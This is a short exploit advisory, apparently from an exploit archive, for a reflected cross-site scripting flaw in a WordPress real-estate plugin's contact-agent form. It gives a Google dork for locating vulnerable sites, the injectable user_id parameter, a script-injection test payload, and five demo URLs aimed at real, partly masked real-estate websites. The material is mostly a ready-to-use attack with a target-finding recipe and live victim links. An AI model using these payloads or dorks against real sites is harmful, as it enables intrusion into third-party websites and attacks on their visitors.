#############################
# Exploit Title : Wordpress Zoo Realty Plugin Cross site scripting Vulnerability
#
# Author : Ashiyane Digital Security Team
#
# Date: 2013/10/05
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php
#
##############
# Location : site//wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=[xss]&popup=1
#
# metod : Get
#
# Script for Test : "/><script>alert(1);</script>
##############
# Demo:
#
# http://www.absXde.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.aXm.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.homeXnds.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.newsXciesforsale.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
# http://www.planXoperties.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1
#
###########################
#
# Discovered By : ACC3SS
#
###########################